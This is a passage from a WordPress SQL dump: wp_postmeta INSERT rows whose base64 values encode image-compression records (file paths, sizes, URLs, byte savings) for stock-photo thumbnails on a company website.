LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NTYwMzU4Mi04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MTYwNCwidGltZSI6MTQ4MzU4MTEwMSwiaWQiOjgzNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg1NjAzNTgyLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NTYwMzU4Mi03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODU2MDM1ODItNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjE0NzMsInRpbWUiOjE0ODM1ODExMDUsImlkIjo4MzR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NTYwMzU4Mi0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg1NjAzNTgyLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg1NjAzNTgyLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjM3MDEsInRpbWUiOjE0ODM1ODExMTAsImlkIjo4MzR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NTYwMzU4Mi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODU2MDM1ODItMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg1NjAzNTgyLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo2NzUsInRpbWUiOjE0ODM1ODExMTQsImlkIjo4MzR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NTYwMzU4Mi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODU2MDM1ODItMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg1NjAzNTgyLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0OTYsInRpbWUiOjE0ODM1ODExMTcsImlkIjo4MzR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NTYwMzU4Mi0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODU2MDM1ODItMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg1NjAzNTgyLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1ODcsInRpbWUiOjE0ODM1ODExMjAsImlkIjo4MzR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NTYwMzU4Mi01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODU2MDM1ODItNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg1NjAzNTgyLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxMjc1LCJ0aW1lIjoxNDgzNTgxMTI1LCJpZCI6ODM0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NTYwMzU4Mi0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODU2MDM1ODItMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg1NjAzNTgyLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo1MTYsInRpbWUiOjE0ODM1ODExMjgsImlkIjo4MzR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg1NjAzNTgyLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NTYwMzU4Mi0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODU2MDM1ODItMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjY0MCwidGltZSI6MTQ4MzU4MTEzMSwiaWQiOjgzNH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODU2MDM1ODItMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg1NjAzNTgyLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NTYwMzU4Mi0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6ODYzLCJ0aW1lIjoxNDgzNTgxMTM1LCJpZCI6ODM0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NTYwMzU4Mi0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODU2MDM1ODItMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg1NjAzNTgyLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxMDIyLCJ0aW1lIjoxNDgzNTgxMTM4LCJpZCI6ODM0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NTYwMzU4Mi00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODU2MDM1ODItNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg1NjAzNTgyLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxMjIxLCJ0aW1lIjoxNDgzNTgxMTQyLCJpZCI6ODM0fV0='); 
INSERT INTO `wp_postmeta` VALUES (29948, 833, 'wpfc_optimisation_reduction', '2677812'); 
INSERT INTO `wp_postmeta` VALUES (29949, 833, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM2NjA4MDgxOS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNjYwODA4MTkuanBnIiwid2lkdGgiOjMwMDAsImhlaWdodCI6MjI3MCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNjYwODA4MTkuanBnIiwicmVkdWN0aW9uIjoyNjc3Nzk5LCJ0aW1lIjoxNDgzNTgxMTU0LCJpZCI6IjgzMyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM2NjA4MDgxOS0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNjYwODA4MTktMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzY2MDgwODE5LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxMTU2LCJpZCI6ODMzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNjYwODA4MTktODAweDYwNS5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjYwNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzY2MDgwODE5LTgwMHg2MDUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM2NjA4MDgxOS04MDB4NjA1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4MTE1OSwiaWQiOjgzM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzY2MDgwODE5LTc2OHg1ODEuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1ODEsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM2NjA4MDgxOS03Njh4NTgxLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNjYwODA4MTktNzY4eDU4MS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODExNjMsImlkIjo4MzN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM2NjA4MDgxOS0xNjAweDEyMTEuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTIxMSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzY2MDgwODE5LTE2MDB4MTIxMS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzY2MDgwODE5LTE2MDB4MTIxMS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODExNjcsImlkIjo4MzN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM2NjA4MDgxOS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNjYwODA4MTktMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzY2MDgwODE5LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxMTY5LCJpZCI6ODMzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNjYwODA4MTktMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzY2MDgwODE5LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM2NjA4MDgxOS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4MTE3MSwiaWQiOjgzM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzY2MDgwODE5LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM2NjA4MDgxOS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNjYwODA4MTktMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODExNzQsImlkIjo4MzN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM2NjA4MDgxOS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNjYwODA4MTktNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzY2MDgwODE5LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxMTc3LCJpZCI6ODMzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM2NjA4MDgxOS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNjYwODA4MTktMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzY2MDgwODE5LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxMTc5LCJpZCI6ODMzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM2NjA4MDgxOS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNjYwODA4MTktMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzY2MDgwODE5LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxMTgyLCJpZCI6ODMzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM2NjA4MDgxOS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNjYwODA4MTktMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzY2MDgwODE5LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxMTg0LCJpZCI6ODMzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM2NjA4MDgxOS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNjYwODA4MTktMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzY2MDgwODE5LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxMTg3LCJpZCI6ODMzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM2NjA4MDgxOS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNjYwODA4MTktNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzY2MDgwODE5LTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxMTg5LCJpZCI6ODMzfV0='); 
INSERT INTO `wp_postmeta` VALUES (29950, 831, 'wpfc_optimisation_reduction', '14725'); 
